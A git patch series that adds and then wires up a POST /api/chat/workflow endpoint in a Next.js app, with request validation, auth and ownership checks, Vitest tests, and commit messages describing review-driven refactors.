From d20ac4e48895e45bac06dd93195513c9ef7da999 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 09:24:00 -0500
Subject: [PATCH 1/5] feat(chat-workflow): POST /api/chat/workflow route stub
 (PR 2 of 5) (#579)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f650) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/api/chat/workflow/route.ts                |  34 ++++
 .../handleChatWorkflowStream.test.ts          | 165 ++++++++++++++++++
 .../__tests__/validateChatWorkflow.test.ts    | 142 +++++++++++++++
 lib/chat/handleChatWorkflowStream.ts          |  61 +++++++
 lib/chat/validateChatWorkflow.ts              |  61 +++++++
 5 files changed, 463 insertions(+)
 create mode 100644 app/api/chat/workflow/route.ts
 create mode 100644 lib/chat/__tests__/handleChatWorkflowStream.test.ts
 create mode 100644 lib/chat/__tests__/validateChatWorkflow.test.ts
 create mode 100644 lib/chat/handleChatWorkflowStream.ts
 create mode 100644 lib/chat/validateChatWorkflow.ts
diff --git a/app/api/chat/workflow/route.ts b/app/api/chat/workflow/route.ts
new file mode 100644
index 000000000..19445c03b
--- /dev/null
+++ b/app/api/chat/workflow/route.ts
@@ -0,0 +1,34 @@
+import type { NextRequest } from "next/server";
+import { NextResponse } from "next/server";
+import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
+import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream";
+
+export const maxDuration = 800; // Next.js route segment config, in seconds — NOTE(review): confirm the plan allows 800
+
+/**
+ * CORS preflight handler: replies 200 with an empty body and getCorsHeaders().
+ *
+ * @returns A body-less NextResponse carrying the CORS headers.
+ */
+export async function OPTIONS() {
+  return new NextResponse(null, {
+    status: 200,
+    headers: getCorsHeaders(),
+  });
+}
+
+/**
+ * POST /api/chat/workflow
+ *
+ * Thin shim: the whole request is delegated to handleChatWorkflowStream,
+ * which currently answers with a hardcoded UIMessage stream stub — the
+ * Vercel Workflow agent loop is wired up in a follow-up PR.
+ *
+ * Contract: https://developers.recoupable.com/api-reference/chat/workflow
+ *
+ * @param request - The incoming NextRequest, passed through unchanged.
+ * @returns Whatever handleChatWorkflowStream resolves to (stream or error).
+ */
+export async function POST(request: NextRequest): Promise<Response> {
+  return handleChatWorkflowStream(request);
+}
diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
new file mode 100644
index 000000000..c61911be8
--- /dev/null
+++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
@@ -0,0 +1,165 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { NextRequest, NextResponse } from "next/server";
+
+import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream";
+import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
+import { selectSessions } from "@/lib/supabase/sessions/selectSessions";
+import { selectChats } from "@/lib/supabase/chats/selectChats";
+import { isSandboxActive } from "@/lib/sandbox/isSandboxActive";
+
+vi.mock("@/lib/chat/validateChatWorkflow", () => ({
+  validateChatWorkflow: vi.fn(),
+}));
+vi.mock("@/lib/supabase/sessions/selectSessions", () => ({
+  selectSessions: vi.fn(),
+}));
+vi.mock("@/lib/supabase/chats/selectChats", () => ({
+  selectChats: vi.fn(),
+}));
+vi.mock("@/lib/sandbox/isSandboxActive", () => ({
+  isSandboxActive: vi.fn(),
+}));
+vi.mock("@/lib/networking/getCorsHeaders", () => ({
+  getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })),
+}));
+
+const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";
+const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb";
+const SESSION_ID = "22222222-2222-2222-2222-222222222222";
+const CHAT_ID = "11111111-1111-1111-1111-111111111111";
+
+function makeRequest(): NextRequest {
+  return new NextRequest("http://localhost/api/chat/workflow", {
+    method: "POST",
+    headers: { "x-api-key": "test-key", "content-type": "application/json" },
+    body: JSON.stringify({ messages: [], chatId: CHAT_ID, sessionId: SESSION_ID }),
+  });
+}
+
+function mockValidatedRequest(overrides: Partial<{ accountId: string }> = {}) {
+  vi.mocked(validateChatWorkflow).mockResolvedValue({
+    messages: [],
+    chatId: CHAT_ID,
+    sessionId: SESSION_ID,
+    accountId: overrides.accountId ?? ACCOUNT_ID,
+    orgId: null,
+    authToken: "test-key",
+  });
+}
+
+function mockOwnedSessionWithActiveSandbox() {
+  mockValidatedRequest();
+  vi.mocked(selectSessions).mockResolvedValue([
+    { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+  ]);
+  vi.mocked(selectChats).mockResolvedValue([{ id: CHAT_ID, session_id: SESSION_ID } as never]);
+  vi.mocked(isSandboxActive).mockReturnValue(true);
+}
+
+describe("handleChatWorkflowStream (stub)", () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+  });
+
+  describe("validation short-circuits", () => {
+    it("returns the validator's short-circuit response unchanged (e.g. 401)", async () => {
+      const authError = NextResponse.json(
+        { status: "error", error: "Unauthorized" },
+        { status: 401 },
+      );
+      vi.mocked(validateChatWorkflow).mockResolvedValue(authError);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(401);
+    });
+
+    it("returns the validator's 400 unchanged (e.g. invalid body)", async () => {
+      const badBody = NextResponse.json(
+        { status: "error", error: "Invalid JSON body" },
+        { status: 400 },
+      );
+      vi.mocked(validateChatWorkflow).mockResolvedValue(badBody);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(400);
+    });
+  });
+
+  describe("session / chat ownership", () => {
+    beforeEach(() => mockValidatedRequest());
+
+    it("returns 404 when the session does not exist", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(404);
+    });
+
+    it("returns 500 when selectSessions errors (returns null)", async () => {
+      vi.mocked(selectSessions).mockResolvedValue(null);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(500);
+    });
+
+    it("returns 403 when the session is owned by a different account", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+      ]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(403);
+    });
+
+    it("returns 400 'Sandbox not initialized' when sandbox is inactive", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: null } as never,
+      ]);
+      vi.mocked(isSandboxActive).mockReturnValue(false);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(400);
+      const body = await res.json();
+      expect(body.error).toMatch(/sandbox/i);
+    });
+
+    it("returns 404 when the chat does not exist", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+      ]);
+      vi.mocked(isSandboxActive).mockReturnValue(true);
+      vi.mocked(selectChats).mockResolvedValue([]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(404);
+    });
+
+    it("returns 404 when chat exists but belongs to a different session", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+      ]);
+      vi.mocked(isSandboxActive).mockReturnValue(true);
+      vi.mocked(selectChats).mockResolvedValue([
+        { id: CHAT_ID, session_id: "different-session" } as never,
+      ]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(404);
+    });
+  });
+
+  describe("success (stub response)", () => {
+    beforeEach(() => mockOwnedSessionWithActiveSandbox());
+
+    it("returns 200 with text/event-stream content type", async () => {
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(200);
+      expect(res.headers.get("content-type") ?? "").toMatch(/text\/event-stream/);
+    });
+
+    it("sets an x-workflow-run-id response header starting with stub-", async () => {
+      const res = await handleChatWorkflowStream(makeRequest());
+      const runId = res.headers.get("x-workflow-run-id");
+      expect(runId).toBeTruthy();
+      expect(runId!.startsWith("stub-")).toBe(true);
+    });
+
+    it("emits a stream body that includes the stub assistant text", async () => {
+      const res = await handleChatWorkflowStream(makeRequest());
+      const text = await res.text();
+      expect(text).toContain("Hello from /api/chat/workflow");
+    });
+  });
+});
diff --git a/lib/chat/__tests__/validateChatWorkflow.test.ts b/lib/chat/__tests__/validateChatWorkflow.test.ts
new file mode 100644
index 000000000..8eb9457c2
--- /dev/null
+++ b/lib/chat/__tests__/validateChatWorkflow.test.ts
@@ -0,0 +1,142 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { NextRequest, NextResponse } from "next/server";
+
+import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
+import { validateAuthContext } from "@/lib/auth/validateAuthContext";
+
+vi.mock("@/lib/auth/validateAuthContext", () => ({
+  validateAuthContext: vi.fn(),
+}));
+
+const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";
+const CHAT_ID = "11111111-1111-1111-1111-111111111111";
+const SESSION_ID = "22222222-2222-2222-2222-222222222222";
+
+const validBody = {
+  messages: [{ id: "m-1", role: "user", parts: [{ type: "text", text: "hi" }] }],
+  chatId: CHAT_ID,
+  sessionId: SESSION_ID,
+};
+
+function makeRequest(body: unknown = validBody): NextRequest {
+  return new NextRequest("http://localhost/api/chat/workflow", {
+    method: "POST",
+    headers: { "x-api-key": "k", "content-type": "application/json" },
+    body: typeof body === "string" ? body : JSON.stringify(body),
+  });
+}
+
+function mockAuthOk() {
+  vi.mocked(validateAuthContext).mockResolvedValue({
+    accountId: ACCOUNT_ID,
+    orgId: null,
+    authToken: "k",
+  });
+}
+
+describe("validateChatWorkflow", () => {
+  beforeEach(() => vi.clearAllMocks());
+
+  describe("valid input", () => {
+    beforeEach(() => mockAuthOk());
+
+    it("returns the validated body augmented with accountId / orgId / authToken", async () => {
+      const result = await validateChatWorkflow(makeRequest());
+      expect(result).not.toBeInstanceOf(NextResponse);
+      if (result instanceof NextResponse) return;
+      expect(result.chatId).toBe(CHAT_ID);
+      expect(result.sessionId).toBe(SESSION_ID);
+      expect(result.messages).toEqual(validBody.messages);
+      expect(result.accountId).toBe(ACCOUNT_ID);
+      expect(result.orgId).toBe(null);
+      expect(result.authToken).toBe("k");
+    });
+
+    it("accepts an optional context.contextLimit integer", async () => {
+      const result = await validateChatWorkflow(
+        makeRequest({ ...validBody, context: { contextLimit: 50 } }),
+      );
+      expect(result).not.toBeInstanceOf(NextResponse);
+      if (result instanceof NextResponse) return;
+      expect(result.context?.contextLimit).toBe(50);
+    });
+
+    it("accepts an empty messages array", async () => {
+      const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: [] }));
+      expect(result).not.toBeInstanceOf(NextResponse);
+    });
+  });
+
+  describe("invalid body", () => {
+    it("returns 400 when JSON is malformed", async () => {
+      const req = new NextRequest("http://localhost/api/chat/workflow", {
+        method: "POST",
+        headers: { "x-api-key": "k", "content-type": "application/json" },
+        body: "{not-json",
+      });
+      const result = await validateChatWorkflow(req);
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when chatId is missing", async () => {
+      const { chatId: _omit, ...rest } = validBody;
+      const result = await validateChatWorkflow(makeRequest(rest));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when sessionId is missing", async () => {
+      const { sessionId: _omit, ...rest } = validBody;
+      const result = await validateChatWorkflow(makeRequest(rest));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when messages is not an array", async () => {
+      const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: "nope" }));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when chatId is empty string", async () => {
+      const result = await validateChatWorkflow(makeRequest({ ...validBody, chatId: "" }));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when context.contextLimit is not an integer", async () => {
+      const result = await validateChatWorkflow(
+        makeRequest({ ...validBody, context: { contextLimit: "fifty" } }),
+      );
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("does not call validateAuthContext when body validation fails", async () => {
+      const { chatId: _omit, ...rest } = validBody;
+      await validateChatWorkflow(makeRequest(rest));
+      expect(validateAuthContext).not.toHaveBeenCalled();
+    });
+  });
+
+  describe("auth", () => {
+    it("returns the auth short-circuit response when validateAuthContext rejects", async () => {
+      const authError = NextResponse.json(
+        { status: "error", error: "Unauthorized" },
+        { status: 401 },
+      );
+      vi.mocked(validateAuthContext).mockResolvedValue(authError);
+      const result = await validateChatWorkflow(makeRequest());
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(401);
+    });
+  });
+});
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
new file mode 100644
index 000000000..137f699cb
--- /dev/null
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -0,0 +1,61 @@
+import { NextRequest, NextResponse } from "next/server";
+import { createUIMessageStream, createUIMessageStreamResponse } from "ai";
+import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
+import { selectSessions } from "@/lib/supabase/sessions/selectSessions";
+import { selectChats } from "@/lib/supabase/chats/selectChats";
+import { isSandboxActive } from "@/lib/sandbox/isSandboxActive";
+import { errorResponse } from "@/lib/networking/errorResponse";
+import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
+import generateUUID from "@/lib/uuid/generateUUID";
+
+/**
+ * Handles POST /api/chat/workflow.
+ *
+ * Stub implementation: delegates auth + body validation to validateChatWorkflow,
+ * verifies ownership of the referenced session + chat, confirms the session's
+ * sandbox is active, then returns a hardcoded UIMessage stream with an
+ * `x-workflow-run-id` header. The Vercel Workflow that will eventually drive
+ * the agent loop is wired up in a follow-up PR — this stub exists so clients
+ * can integrate against the contract documented at
+ * /api-reference/chat/workflow.
+ *
+ * @param request - The incoming NextRequest
+ * @returns A streaming Response (200) or a NextResponse error.
+ */
+export async function handleChatWorkflowStream(request: NextRequest): Promise<Response> {
+  const validated = await validateChatWorkflow(request);
+  if (validated instanceof NextResponse) return validated;
+
+  const sessions = await selectSessions({ id: validated.sessionId });
+  if (sessions === null) return errorResponse("Internal server error", 500);
+  const session = sessions[0];
+  if (!session) return errorResponse("Session not found", 404);
+  if (session.account_id !== validated.accountId) return errorResponse("Forbidden", 403);
+  if (!isSandboxActive(session)) return errorResponse("Sandbox not initialized", 400);
+
+  const chats = await selectChats({ id: validated.chatId });
+  const chat = chats[0];
+  if (!chat || chat.session_id !== validated.sessionId) {
+    return errorResponse("Chat not found", 404);
+  }
+
+  const runId = `stub-${generateUUID()}`;
+
+  const stream = createUIMessageStream({
+    generateId: generateUUID,
+    execute: ({ writer }) => {
+      const id = generateUUID();
+      writer.write({ type: "text-start", id });
+      writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" });
+      writer.write({ type: "text-end", id });
+    },
+  });
+
+  return createUIMessageStreamResponse({
+    stream,
+    headers: {
+      ...getCorsHeaders(),
+      "x-workflow-run-id": runId,
+    },
+  });
+}
diff --git a/lib/chat/validateChatWorkflow.ts b/lib/chat/validateChatWorkflow.ts
new file mode 100644
index 000000000..4fd8e6c66
--- /dev/null
+++ b/lib/chat/validateChatWorkflow.ts
@@ -0,0 +1,61 @@
+import type { NextRequest } from "next/server";
+import { NextResponse } from "next/server";
+import { z } from "zod";
+import { validateAuthContext } from "@/lib/auth/validateAuthContext";
+import { errorResponse } from "@/lib/networking/errorResponse";
+import { validationErrorResponse } from "@/lib/zod/validationErrorResponse";
+
+export const chatWorkflowBodySchema = z.object({
+  messages: z.array(z.any()), // must be an array; element shape is not checked here
+  chatId: z.string().min(1, "chatId is required"),
+  sessionId: z.string().min(1, "sessionId is required"),
+  context: z
+    .object({
+      contextLimit: z.number().int("contextLimit must be an integer"), // zero and negatives also pass
+    })
+    .optional(),
+});
+
+export type ChatWorkflowBody = z.infer<typeof chatWorkflowBodySchema>;
+
+export type ChatWorkflowRequest = ChatWorkflowBody & {
+  accountId: string; // copied from the validateAuthContext result
+  orgId: string | null; // copied from the validateAuthContext result
+  authToken?: string; // copied from the validateAuthContext result
+};
+
+/**
+ * Validates a POST /api/chat/workflow request in three ordered stages:
+ * JSON parse (400 on failure), schema check (first Zod issue reported),
+ * then validateAuthContext. Auth runs last, so it is never invoked for a
+ * malformed body. Any failure is returned as a NextResponse short-circuit.
+ *
+ * @param request - The incoming NextRequest.
+ * @returns A NextResponse error, or the parsed body plus accountId / orgId / authToken.
+ */
+export async function validateChatWorkflow(
+  request: NextRequest,
+): Promise<NextResponse | ChatWorkflowRequest> {
+  let rawBody: unknown;
+  try {
+    rawBody = await request.json();
+  } catch {
+    return errorResponse("Invalid JSON body", 400);
+  }
+
+  const parsed = chatWorkflowBodySchema.safeParse(rawBody);
+  if (!parsed.success) {
+    const firstError = parsed.error.issues[0];
+    return validationErrorResponse(firstError.message, firstError.path);
+  }
+
+  const auth = await validateAuthContext(request);
+  if (auth instanceof NextResponse) return auth;
+
+  return {
+    ...parsed.data,
+    accountId: auth.accountId,
+    orgId: auth.orgId,
+    authToken: auth.authToken,
+  };
+}

From f9efbea9e269bdb6980656e5e35e483b30705d66 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 12:07:35 -0500
Subject: [PATCH 2/5] feat(chat-workflow): wire POST /api/chat/workflow to
 durable Vercel Workflow (PR 3 of 4) (#581)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream from PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 compareAndSetChatActiveStreamId +
3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists +
5 isFirstChatMessage + 7 persistLatestUserMessage +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously the call was not
  awaited, so a rejected cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both fixes are behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/lib/workflows/runAgentStep.ts             |  55 ++++
 app/lib/workflows/runAgentWorkflow.ts         |  56 ++++
 .../compareAndSetChatActiveStreamId.test.ts   |  51 +++
 .../handleChatWorkflowStream.test.ts          | 301 ++++++++++++++----
 .../__tests__/maybeResumeChatStream.test.ts   |  46 +++
 .../persistLatestUserMessage.test.ts          | 129 ++++++++
 .../reconcileExistingActiveStream.test.ts     |  92 ++++++
 lib/chat/agentCustomInstructions.ts           |   9 +
 lib/chat/assistantFileLinks.ts                |  28 ++
 lib/chat/compareAndSetChatActiveStreamId.ts   |  49 +++
 lib/chat/handleChatWorkflowStream.ts          | 100 ++++--
 lib/chat/maybeResumeChatStream.ts             |  40 +++
 lib/chat/persistLatestUserMessage.ts          |  84 +++++
 lib/chat/reconcileExistingActiveStream.ts     |  56 ++++
 lib/chat/recoupApiSkillPrompt.ts              |  11 +
 lib/recoupable/__tests__/extractOrgId.test.ts |  57 ++++
 lib/recoupable/extractOrgId.ts                |  31 ++
 .../__tests__/selectChatMessages.test.ts      |  58 ++++
 .../__tests__/upsertChatMessage.test.ts       |  46 +++
 .../chat_messages/selectChatMessages.ts       |  40 +++
 .../chat_messages/upsertChatMessage.ts        |  37 +++
 .../chats/__tests__/updateChat.test.ts        | 110 +++++++
 lib/supabase/chats/updateChat.ts              |  86 +++++
 23 files changed, 1478 insertions(+), 94 deletions(-)
 create mode 100644 app/lib/workflows/runAgentStep.ts
 create mode 100644 app/lib/workflows/runAgentWorkflow.ts
 create mode 100644 lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts
 create mode 100644 lib/chat/__tests__/maybeResumeChatStream.test.ts
 create mode 100644 lib/chat/__tests__/persistLatestUserMessage.test.ts
 create mode 100644 lib/chat/__tests__/reconcileExistingActiveStream.test.ts
 create mode 100644 lib/chat/agentCustomInstructions.ts
 create mode 100644 lib/chat/assistantFileLinks.ts
 create mode 100644 lib/chat/compareAndSetChatActiveStreamId.ts
 create mode 100644 lib/chat/maybeResumeChatStream.ts
 create mode 100644 lib/chat/persistLatestUserMessage.ts
 create mode 100644 lib/chat/reconcileExistingActiveStream.ts
 create mode 100644 lib/chat/recoupApiSkillPrompt.ts
 create mode 100644 lib/recoupable/__tests__/extractOrgId.test.ts
